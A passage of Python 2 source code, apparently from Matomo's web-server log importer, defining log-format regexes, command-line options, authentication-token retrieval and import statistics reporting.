# W3C logs when detecting the format. This way there will be
# less accidental importing of IIS logs w/o --w3c-time-taken-milli.
})
def __init__(self):
super(IisFormat, self).__init__()
self.name = 'iis'
class ShoutcastFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'c-status': '(?P<status>\d+)',
'x-duration': '(?P<generation_time_secs>[.\d]+)'
})
def __init__(self):
super(ShoutcastFormat, self).__init__()
self.name = 'shoutcast'
def get(self, key):
if key == 'user_agent':
user_agent = super(ShoutcastFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(ShoutcastFormat, self).get(key)
class AmazonCloudFrontFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'x-event': '(?P<event_action>\S+)',
'x-sname': '(?P<event_name>\S+)',
'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)',
'c-user-agent': '(?P<user_agent>".*?"|\S+)',
# following are present to match cloudfront instead of W3C when we know it's cloudfront
'x-edge-location': '(?P<x_edge_location>".*?"|\S+)',
'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)',
'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)',
'x-host-header': '(?P<x_host_header>".*?"|\S+)'
})
def __init__(self):
super(AmazonCloudFrontFormat, self).__init__()
self.name = 'amazon_cloudfront'
def get(self, key):
if key == 'event_category' and 'event_category' not in self.matched:
return 'cloudfront_rtmp'
elif key == 'status' and 'status' not in self.matched:
return '200'
elif key == 'user_agent':
user_agent = super(AmazonCloudFrontFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(AmazonCloudFrontFormat, self).get(key)
_HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+'
_COMMON_LOG_FORMAT = (
'(?P<ip>[\w*.:-]+)\s+\S+\s+(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+(?P<length>\S+)'
)
_NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT +
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_S3_LOG_FORMAT = (
'\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>[\w*.:-]+)\s+'
'(?P<userid>\S+)\s+\S+\s+\S+\s+\S+\s+"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+\S+\s+(?P<length>\S+)\s+'
'\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT +
'\s+(?P<session_time>[0-9-]+)'
)
_ELB_LOG_FORMAT = (
'(?P<date>[0-9-]+T[0-9:]+)\.\S+\s+\S+\s+(?P<ip>[\w*.:-]+):\d+\s+\S+:\d+\s+\S+\s+(?P<generation_time_secs>\S+)\s+\S+\s+'
'(?P<status>\d+)\s+\S+\s+\S+\s+(?P<length>\S+)\s+'
'"\S+\s+\w+:\/\/(?P<host>[\w\-\.]*):\d+(?P<path>\/\S*)\s+[^"]+"\s+"(?P<user_agent>[^"]+)"\s+\S+\s+\S+'
)
_OVH_FORMAT = (
'(?P<ip>\S+)\s+' + _HOST_PREFIX + '(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)'
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
FORMATS = {
'common': RegexFormat('common', _COMMON_LOG_FORMAT),
'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT),
'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT),
'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT),
'w3c_extended': W3cExtendedFormat(),
'amazon_cloudfront': AmazonCloudFrontFormat(),
'iis': IisFormat(),
'shoutcast': ShoutcastFormat(),
's3': RegexFormat('s3', _S3_LOG_FORMAT),
'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT),
'elb': RegexFormat('elb', _ELB_LOG_FORMAT, '%Y-%m-%dT%H:%M:%S'),
'nginx_json': JsonFormat('nginx_json'),
'ovh': RegexFormat('ovh', _OVH_FORMAT)
}
##
## Code.
##
class Configuration(object):
"""
Stores all the configuration options by reading sys.argv and parsing,
if needed, the config.inc.php.
It has 2 attributes: options and filenames.
"""
class Error(Exception):
pass
def _create_parser(self):
"""
Initialize and return the OptionParser instance.
"""
option_parser = optparse.OptionParser(
usage='Usage: %prog [options] log_file [ log_file [...] ]',
description="Import HTTP access logs to Matomo. "
"log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). "
" You may also import many log files at once (for example set log_file to *.log or *.log.gz)."
" By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.",
epilog="About Matomo Server Log Analytics: https://matomo.org/log-analytics/ "
" Found a bug? Please create a ticket in https://dev.matomo.org/ "
" Please send your suggestions or successful user story to hello@matomo.org "
)
# Basic auth user
option_parser.add_option(
'--auth-user', dest='auth_user',
help="Basic auth user",
)
# Basic auth password
option_parser.add_option(
'--auth-password', dest='auth_password',
help="Basic auth password",
)
option_parser.add_option(
'--debug', '-d', dest='debug', action='count', default=0,
help="Enable debug output (specify multiple times for more verbose)",
)
option_parser.add_option(
'--debug-tracker', dest='debug_tracker', action='store_true', default=False,
help="Appends &debug=1 to tracker requests and prints out the result so the tracker can be debugged. If "
"using the log importer results in errors with the tracker or improperly recorded visits, this option can "
"be used to find out what the tracker is doing wrong. To see debug tracker output, you must also set the "
"[Tracker] debug_on_demand INI config to 1 in your Matomo's config.ini.php file."
)
option_parser.add_option(
'--debug-request-limit', dest='debug_request_limit', type='int', default=None,
help="Debug option that will exit after N requests are parsed. Can be used w/ --debug-tracker to limit the "
"output of a large log file."
)
option_parser.add_option(
'--url', dest='matomo_url',
help="REQUIRED Your Matomo server URL, eg. http://example.com/matomo/ or http://analytics.example.net",
)
option_parser.add_option(
'--api-url', dest='matomo_api_url',
help="This URL will be used to send API requests (use it if your tracker URL differs from UI/API url), "
"eg. http://other-example.com/matomo/ or http://analytics-api.example.net",
)
option_parser.add_option(
'--dry-run', dest='dry_run',
action='store_true', default=False,
help="Perform a trial run with no tracking data being inserted into Matomo",
)
option_parser.add_option(
'--show-progress', dest='show_progress',
action='store_true', default=os.isatty(sys.stdout.fileno()),
help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)"
)
option_parser.add_option(
'--show-progress-delay', dest='show_progress_delay',
type='int', default=1,
help="Change the default progress delay"
)
option_parser.add_option(
'--add-sites-new-hosts', dest='add_sites_new_hosts',
action='store_true', default=False,
help="When a hostname is found in the log file, but not matched to any website "
"in Matomo, automatically create a new website in Matomo with this hostname to "
"import the logs"
)
option_parser.add_option(
'--idsite', dest='site_id',
help= ("When specified, "
"data in the specified log files will be tracked for this Matomo site ID."
" The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).")
)
option_parser.add_option(
'--idsite-fallback', dest='site_id_fallback',
help="Default Matomo site ID to use if the hostname doesn't match any "
"known Website's URL. New websites will not be automatically created. "
" Used only if --add-sites-new-hosts or --idsite are not set",
)
default_config = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../config/config.ini.php'),
)
option_parser.add_option(
'--config', dest='config_file', default=default_config,
help=(
"This is only used when --login and --password is not used. "
"Matomo will read the configuration file (default: %default) to "
"fetch the Super User token_auth from the config file. "
)
)
option_parser.add_option(
'--login', dest='login',
help="You can manually specify the Matomo Super User login"
)
option_parser.add_option(
'--password', dest='password',
help="You can manually specify the Matomo Super User password"
)
option_parser.add_option(
'--token-auth', dest='matomo_token_auth',
help="Matomo user token_auth, the token_auth is found in Matomo > Settings > API. "
"You must use a token_auth that has at least 'admin' or 'super user' permission. "
"If you use a token_auth for a non admin user, your users' IP addresses will not be tracked properly. "
)
option_parser.add_option(
'--hostname', dest='hostnames', action='append', default=[],
help="Accepted hostname (requests with other hostnames will be excluded). "
" You may use the star character * "
" Example: --hostname=*domain.com"
" Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path', dest='excluded_paths', action='append', default=[],
help="Any URL path matching this exclude-path will not be imported in Matomo. "
" You must use the star character *. "
" Example: --exclude-path=*/admin/*"
" Can be specified multiple times. "
)
option_parser.add_option(
'--exclude-path-from', dest='exclude_path_from',
help="Each line from this file is a path to exclude. Each path must contain the character * to match a string. (see: --exclude-path)"
)
option_parser.add_option(
'--include-path', dest='included_paths', action='append', default=[],
help="Paths to include. Can be specified multiple times. If not specified, all paths are included."
)
option_parser.add_option(
'--include-path-from', dest='include_path_from',
help="Each line from this file is a path to include"
)
option_parser.add_option(
'--useragent-exclude', dest='excluded_useragents',
action='append', default=[],
help="User agents to exclude (in addition to the standard excluded "
"user agents). Can be specified multiple times",
)
option_parser.add_option(
'--enable-static', dest='enable_static',
action='store_true', default=False,
help="Track static files (images, css, js, ico, ttf, etc.)"
)
option_parser.add_option(
'--enable-bots', dest='enable_bots',
action='store_true', default=False,
help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'"
)
option_parser.add_option(
'--enable-http-errors', dest='enable_http_errors',
action='store_true', default=False,
help="Track HTTP errors (status code 4xx or 5xx)"
)
option_parser.add_option(
'--enable-http-redirects', dest='enable_http_redirects',
action='store_true', default=False,
help="Track HTTP redirects (status code 3xx except 304)"
)
option_parser.add_option(
'--enable-reverse-dns', dest='reverse_dns',
action='store_true', default=False,
help="Enable reverse DNS, used to generate the 'Providers' report in Matomo. "
"Disabled by default, as it impacts performance"
)
option_parser.add_option(
'--strip-query-string', dest='strip_query_string',
action='store_true', default=False,
help="Strip the query string from the URL"
)
option_parser.add_option(
'--query-string-delimiter', dest='query_string_delimiter', default='?',
help="The query string delimiter (default: %default)"
)
option_parser.add_option(
'--log-format-name', dest='log_format_name', default=None,
help=("Access log format to detect (supported are: %s). "
"When not specified, the log format will be autodetected by trying all supported log formats."
% ', '.join(sorted(FORMATS.iterkeys())))
)
available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status',
'length', 'host', 'userid', 'generation_time_milli', 'event_action',
'event_name', 'timezone', 'session_time']
option_parser.add_option(
'--log-format-regex', dest='log_format_regex', default=None,
help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. "
"Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. "
"Overrides --log-format-name." % (', '.join(available_regex_groups))
)
option_parser.add_option(
'--log-date-format', dest='log_date_format', default=None,
help="Format string used to parse dates. You can specify any format that can also be specified to "
"the strptime python function."
)
option_parser.add_option(
'--log-hostname', dest='log_hostname', default=None,
help="Force this hostname for a log format that doesn't include it. All hits "
"will seem to come to this host"
)
option_parser.add_option(
'--skip', dest='skip', default=0, type='int',
help="Skip the n first lines to start parsing/importing data at a given line for the specified log file",
)
option_parser.add_option(
'--recorders', dest='recorders', default=1, type='int',
help="Number of simultaneous recorders (default: %default). "
"It should be set to the number of CPU cores in your server. "
"You can also experiment with higher values which may increase performance until a certain point",
)
option_parser.add_option(
'--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int',
help="Maximum number of log entries to record in one tracking request (default: %default). "
)
option_parser.add_option(
'--replay-tracking', dest='replay_tracking',
action='store_true', default=False,
help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee https://matomo.org/faq/how-to/faq_17033/"
)
option_parser.add_option(
'--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php',
help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults "
"to 'piwik.php' so only requests to the piwik.php file will be imported."
)
option_parser.add_option(
'--output', dest='output',
help="Redirect output (stdout and stderr) to the specified file"
)
option_parser.add_option(
'--encoding', dest='encoding', default='utf8',
help="Log files encoding (default: %default)"
)
option_parser.add_option(
'--disable-bulk-tracking', dest='use_bulk_tracking',
default=True, action='store_false',
help="Disables use of bulk tracking so recorders record one hit at a time."
)
option_parser.add_option(
'--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float',
help="Debug option that will force each recorder to record one hit every N secs."
)
option_parser.add_option(
'--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true',
help="Make URL path lowercase so paths with the same letters but different cases are "
"treated the same."
)
option_parser.add_option(
'--enable-testmode', dest='enable_testmode', default=False, action='store_true',
help="If set, it will try to get the token_auth from the matomo_tests directory"
)
option_parser.add_option(
'--download-extensions', dest='download_extensions', default=None,
help="By default Matomo tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped."
)
option_parser.add_option(
'--add-download-extensions', dest='extra_download_extensions', default=None,
help="Add extensions that should be treated as downloads. See --download-extensions for more info."
)
option_parser.add_option(
'--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string',
help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log "
"files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used "
"as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n"
"Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more "
"fields that can be mapped."
% (', '.join(W3cExtendedFormat.fields.keys()))
)
option_parser.add_option(
'--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs',
help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing"
" IIS logs."
)
option_parser.add_option(
'--w3c-fields', dest='w3c_fields', default=None,
help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if "
"your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used "
"in conjuction with --log-format-name=w3c_extended.\n"
"Example: --w3c-fields='#Fields: date time c-ip ...'"
)
option_parser.add_option(
'--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string',
help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the "
"importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track "
"the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) "
"--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field "
"in the 'Windows Status Code' custom variable. Regexes must contain a named group."
)
option_parser.add_option(
'--title-category-delimiter', dest='title_category_delimiter', default='/',
help="If --enable-http-errors is used, errors are shown in the page titles report. If you have "
"changed General.action_title_category_delimiter in your Matomo configuration, you need to set this "
"option to the same value in order to get a pretty page titles report."
)
option_parser.add_option(
'--dump-log-regex', dest='dump_log_regex', action='store_true', default=False,
help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats "
"in newer versions of the script in older versions of the script. The output regex can be used with "
"the --log-format-regex option."
)
option_parser.add_option(
'--ignore-groups', dest='regex_groups_to_ignore', default=None,
help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, "
"disable normal user id tracking. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string',
help="Track an attribute through a custom variable with visit scope instead of through Matomo's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string',
help="Track an attribute through a custom variable with page scope instead of through Matomo's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--track-http-method', dest='track_http_method', default=False,
help="Enables tracking of http method as custom page variable if method group is available in log format."
)
option_parser.add_option(
'--retry-max-attempts', dest='max_attempts', default=MATOMO_DEFAULT_MAX_ATTEMPTS, type='int',
help="The maximum number of times to retry a failed tracking request."
)
option_parser.add_option(
'--retry-delay', dest='delay_after_failure', default=MATOMO_DEFAULT_DELAY_AFTER_FAILURE, type='int',
help="The number of seconds to wait before retrying a failed tracking request."
)
option_parser.add_option(
'--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int',
help="The maximum number of seconds to wait before terminating an HTTP request to Matomo."
)
option_parser.add_option(
'--include-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'include_host'),
help="Only import logs from the specified host(s)."
)
option_parser.add_option(
'--exclude-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'exclude_host'),
help="Only import logs that are not from the specified host(s)."
)
option_parser.add_option(
'--exclude-older-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_older_than'),
help="Ignore logs older than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--exclude-newer-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_newer_than'),
help="Ignore logs newer than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--add-to-date', dest='seconds_to_add_to_date', default=0, type='int',
help="A number of seconds to add to each date value in the log file."
)
option_parser.add_option(
'--request-suffix', dest='request_suffix', default=None, type='string', help="Extra parameters to append to tracker and API requests."
)
option_parser.add_option(
'--accept-invalid-ssl-certificate',
dest='accept_invalid_ssl_certificate', action='store_true',
default=False,
help="Do not verify the SSL / TLS certificate when contacting the Matomo server. This is the default when running on Python 2.7.8 or older."
)
return option_parser
def _set_date(self, option_attr_name, option, opt_str, value, parser):
try:
(date_str, timezone) = value.rsplit(' ', 1)
except:
fatal_error("Invalid date value '%s'." % value)
if not re.match('[-+][0-9]{4}', timezone):
fatal_error("Invalid date value '%s': expected valid timzeone like +0100 or -1200, got '%s'" % (value, timezone))
timezone = float(timezone)
date = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')
date -= datetime.timedelta(hours=timezone/100)
setattr(parser.values, option_attr_name, date)
def _add_to_array(self, option_attr_name, option, opt_str, value, parser):
if not hasattr(parser.values, option_attr_name) or not getattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, [])
getattr(parser.values, option_attr_name).append(value)
def _set_option_map(self, option_attr_name, option, opt_str, value, parser):
"""
Sets a key-value mapping in a dict that is built from command line options. Options that map
string keys to string values (like --w3c-map-field) can set the callback to a bound partial
of this method to handle the option.
"""
parts = value.split('=')
if len(parts) != 2:
fatal_error("Invalid %s option: '%s'" % (opt_str, value))
key, value = parts
if not hasattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, {})
getattr(parser.values, option_attr_name)[key] = value
def _parse_args(self, option_parser):
"""
Parse the command line args and create self.options and self.filenames.
"""
self.options, self.filenames = option_parser.parse_args(sys.argv[1:])
if self.options.output:
sys.stdout = sys.stderr = open(self.options.output, 'a+', 0)
if not self.filenames:
print(option_parser.format_help())
sys.exit(1)
# Configure logging before calling logging.{debug,info}.
logging.basicConfig(
format='%(asctime)s: [%(levelname)s] %(message)s',
level=logging.DEBUG if self.options.debug >= 1 else logging.INFO,
)
self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents])
if self.options.exclude_path_from:
paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()]
self.options.excluded_paths.extend(path for path in paths if len(path) > 0)
if self.options.excluded_paths:
self.options.excluded_paths = set(self.options.excluded_paths)
logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths))
if self.options.include_path_from:
paths = [path.strip() for path in open(self.options.include_path_from).readlines()]
self.options.included_paths.extend(path for path in paths if len(path) > 0)
if self.options.included_paths:
self.options.included_paths = set(self.options.included_paths)
logging.debug('Included paths: %s', ' '.join(self.options.included_paths))
if self.options.hostnames:
logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames))
else:
logging.debug('Accepted hostnames: all')
if self.options.log_format_regex:
self.format = RegexFormat('custom', self.options.log_format_regex, self.options.log_date_format)
elif self.options.log_format_name:
try:
self.format = FORMATS[self.options.log_format_name]
except KeyError:
fatal_error('invalid log format: %s' % self.options.log_format_name)
else:
self.format = None
if not hasattr(self.options, 'custom_w3c_fields'):
self.options.custom_w3c_fields = {}
elif self.format is not None:
# validate custom field mappings
for custom_name, default_name in self.options.custom_w3c_fields.iteritems():
if default_name not in type(format).fields:
fatal_error("custom W3C field mapping error: don't know how to parse and use the '%' field" % default_name)
return
if not hasattr(self.options, 'regex_group_to_visit_cvars_map'):
self.options.regex_group_to_visit_cvars_map = {}
if not hasattr(self.options, 'regex_group_to_page_cvars_map'):
self.options.regex_group_to_page_cvars_map = {}
if not hasattr(self.options, 'w3c_field_regexes'):
self.options.w3c_field_regexes = {}
else:
# make sure each custom w3c field regex has a named group
for field_name, field_regex in self.options.w3c_field_regexes.iteritems():
if '(?P<' not in field_regex:
fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name))
return
if not self.options.matomo_url:
fatal_error('no URL given for Matomo')
if not (self.options.matomo_url.startswith('http://') or self.options.matomo_url.startswith('https://')):
self.options.matomo_url = 'http://' + self.options.matomo_url
logging.debug('Matomo Tracker API URL is: %s', self.options.matomo_url)
if not self.options.matomo_api_url:
self.options.matomo_api_url = self.options.matomo_url
if not (self.options.matomo_api_url.startswith('http://') or self.options.matomo_api_url.startswith('https://')):
self.options.matomo_api_url = 'http://' + self.options.matomo_api_url
logging.debug('Matomo Analytics API URL is: %s', self.options.matomo_api_url)
if self.options.recorders < 1:
self.options.recorders = 1
download_extensions = DOWNLOAD_EXTENSIONS
if self.options.download_extensions:
download_extensions = set(self.options.download_extensions.split(','))
if self.options.extra_download_extensions:
download_extensions.update(self.options.extra_download_extensions.split(','))
self.options.download_extensions = download_extensions
if self.options.regex_groups_to_ignore:
self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(','))
def __init__(self):
self._parse_args(self._create_parser())
def _get_token_auth(self):
"""
If the token auth is not specified in the options, get it from Matomo.
"""
# Get superuser login/password from the options.
logging.debug('No token-auth specified')
if self.options.login and self.options.password:
matomo_login = self.options.login
matomo_password = hashlib.md5(self.options.password).hexdigest()
logging.debug('Using credentials: (login = %s, password = %s)', matomo_login, matomo_password)
try:
api_result = matomo.call_api('UsersManager.getTokenAuth',
userLogin=matomo_login,
md5Password=matomo_password,
_token_auth='',
_url=self.options.matomo_api_url,
)
except urllib2.URLError as e:
fatal_error('error when fetching token_auth from the API: %s' % e)
try:
return api_result['value']
except KeyError:
# Happens when the credentials are invalid.
message = api_result.get('message')
fatal_error(
'error fetching authentication token token_auth%s' % (
': %s' % message if message else '')
)
else:
# Fallback to the given (or default) configuration file, then
# get the token from the API.
logging.debug(
'No credentials specified, reading them from "%s"',
self.options.config_file,
)
config_file = ConfigParser.RawConfigParser()
success = len(config_file.read(self.options.config_file)) > 0
if not success:
fatal_error(
"the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable by the user running this script to get the authentication token"
)
updatetokenfile = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../misc/cron/updatetoken.php'),
)
phpBinary = 'php'
is_windows = sys.platform.startswith('win')
if is_windows:
try:
processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
[stdout, stderr] = processWin.communicate()
if processWin.returncode == 0:
phpBinary = stdout.strip()
else:
fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option")
except:
fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue")
command = [phpBinary, updatetokenfile]
if self.options.enable_testmode:
command.append('--testmode')
hostname = urlparse.urlparse( self.options.matomo_url ).hostname
command.append('--piwik-domain=' + hostname )
command = subprocess.list2cmdline(command)
# logging.debug(command);
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
[stdout, stderr] = process.communicate()
if process.returncode != 0:
fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option")
filename = stdout
credentials = open(filename, 'r').readline()
credentials = credentials.split('\t')
return credentials[1]
def get_resolver(self):
if self.options.site_id:
logging.debug('Resolver: static')
return StaticResolver(self.options.site_id)
else:
logging.debug('Resolver: dynamic')
return DynamicResolver()
def init_token_auth(self):
if not self.options.matomo_token_auth:
try:
self.options.matomo_token_auth = self._get_token_auth()
except Matomo.Error as e:
fatal_error(e)
logging.debug('Authentication token token_auth is: %s', self.options.matomo_token_auth)
class Statistics(object):
"""
Store statistics about parsed logs and recorded entries.
Can optionally print statistics on standard output every second.
"""
class Counter(object):
"""
Simple integers cannot be used by multithreaded programs. See:
http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe
"""
def __init__(self):
# itertools.count's implementation in C does not release the GIL and
# therefore is thread-safe.
self.counter = itertools.count(1)
self.value = 0
def increment(self):
self.value = self.counter.next()
def advance(self, n):
for i in range(n):
self.increment()
def __str__(self):
return str(int(self.value))
def __init__(self):
self.time_start = None
self.time_stop = None
self.matomo_sites = set() # sites ID
self.matomo_sites_created = [] # (hostname, site ID)
self.matomo_sites_ignored = set() # hostname
self.count_lines_parsed = self.Counter()
self.count_lines_recorded = self.Counter()
# requests that the Matomo tracker considered invalid (or failed to track)
self.invalid_lines = []
# Do not match the regexp.
self.count_lines_invalid = self.Counter()
# Were filtered out.
self.count_lines_filtered = self.Counter()
# No site ID found by the resolver.
self.count_lines_no_site = self.Counter()
# Hostname filtered by config.options.hostnames
self.count_lines_hostname_skipped = self.Counter()
# Static files.
self.count_lines_static = self.Counter()
# Ignored user-agents.
self.count_lines_skipped_user_agent = self.Counter()
# Ignored HTTP erors.
self.count_lines_skipped_http_errors = self.Counter()
# Ignored HTTP redirects.
self.count_lines_skipped_http_redirects = self.Counter()
# Downloads
self.count_lines_downloads = self.Counter()
# Ignored downloads when --download-extensions is used
self.count_lines_skipped_downloads = self.Counter()
# Misc
self.dates_recorded = set()
self.monitor_stop = False
def set_time_start(self):
self.time_start = time.time()
def set_time_stop(self):
self.time_stop = time.time()
def _compute_speed(self, value, start, end):
delta_time = end - start
if value == 0:
return 0
if delta_time == 0:
return 'very high!'
else:
return value / delta_time
def _round_value(self, value, base=100):
return round(value * base) / base
def _indent_text(self, lines, level=1):
"""
Return an indented text. 'lines' can be a list of lines or a single
line (as a string). One level of indentation is 4 spaces.
"""
prefix = ' ' * (4 * level)
if isinstance(lines, basestring):
return prefix + lines
else:
return '\n'.join(
prefix + line
for line in lines
)
def print_summary(self):
invalid_lines_summary = ''
if self.invalid_lines:
invalid_lines_summary = '''Invalid log lines
-----------------
The following lines were not tracked by Matomo, either due to a malformed tracker request or error in the tracker:
%s
''' % textwrap.fill(", ".join(self.invalid_lines), 80)
print('''
%(invalid_lines)sLogs import summary
-------------------
%(count_lines_recorded)d requests imported successfully
%(count_lines_downloads)d requests were downloads
%(total_lines_ignored)d requests ignored:
%(count_lines_skipped_http_errors)d HTTP errors
%(count_lines_skipped_http_redirects)d HTTP redirects
%(count_lines_invalid)d invalid log lines
%(count_lines_filtered)d filtered log lines
%(count_lines_no_site)d requests did not match any known site
%(count_lines_hostname_skipped)d requests did not match any --hostname
%(count_lines_skipped_user_agent)d requests done by bots, search engines...
%(count_lines_static)d requests to static resources (css, js, images, ico, ttf...)
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions
Website import summary
----------------------
%(count_lines_recorded)d requests imported to %(total_sites)d sites
%(total_sites_existing)d sites already existed
%(total_sites_created)d sites were created:
%(sites_created)s
%(total_sites_ignored)d distinct hostnames did not match any existing site:
%(sites_ignored)s
%(sites_ignored_tips)s
Performance summary
-------------------
Total time: %(total_time)d seconds
Requests imported per second: %(speed_recording)s requests per second
Processing your log data
------------------------
In order for your logs to be processed by Matomo, you may need to run the following command:
./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s'
''' % {
'count_lines_recorded': self.count_lines_recorded.value,
'count_lines_downloads': self.count_lines_downloads.value,
'total_lines_ignored': sum([
self.count_lines_invalid.value,
self.count_lines_filtered.value,
self.count_lines_skipped_user_agent.value,
self.count_lines_skipped_http_errors.value,
self.count_lines_skipped_http_redirects.value,
self.count_lines_static.value,
self.count_lines_skipped_downloads.value,
self.count_lines_no_site.value,
self.count_lines_hostname_skipped.value,
]),
'count_lines_invalid': self.count_lines_invalid.value,
'count_lines_filtered': self.count_lines_filtered.value,
'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value,
'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value,
'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value,
'count_lines_static': self.count_lines_static.value,
'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value,
'count_lines_no_site': self.count_lines_no_site.value,
'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value,
'total_sites': len(self.matomo_sites),
'total_sites_existing': len(self.matomo_sites - set(site_id for hostname, site_id in self.matomo_sites_created)),
'total_sites_created': len(self.matomo_sites_created),
'sites_created': self._indent_text(
